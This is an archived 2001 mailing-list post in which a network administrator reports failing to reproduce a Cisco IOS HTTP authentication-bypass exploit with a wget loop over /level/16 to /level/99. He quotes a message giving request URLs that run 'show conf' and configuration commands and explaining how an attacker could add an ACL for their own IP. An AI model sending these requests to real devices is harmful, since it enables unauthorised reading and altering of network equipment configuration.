hi, i cant seem to recreate this exploit on any of my 1900/2900/2500/2600's? ip http server ip http authentication local i have a little /bin/sh that does the following: wget http://10.10.10.10/level/16/show/config . . wget http://10.10.10.10/level/99/show/config i get auth failed on all of them! anyone? Regards, Marc-Adrian Napoli Network Administrator Connect infobahn Australia +61 2 92120387 > You can also run configuration commands. :) > > http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc. > > Start with http://169.254.0.16/level/xx/configure and go from there. > > A malicious user could use: > > http://169.254.0.15/level/42/exec/show%20conf > > to get, for instance, vty 0 4 acl information and then add an ACL for > his/her source ip. > > I tested creating a banner. I assume other configure commands will work > as well. This was tested on a Cisco switch. Anyone? > > > >
This archive was generated by hypermail 2b30 : Tue Jul 03 2001 - 12:18:15 PDT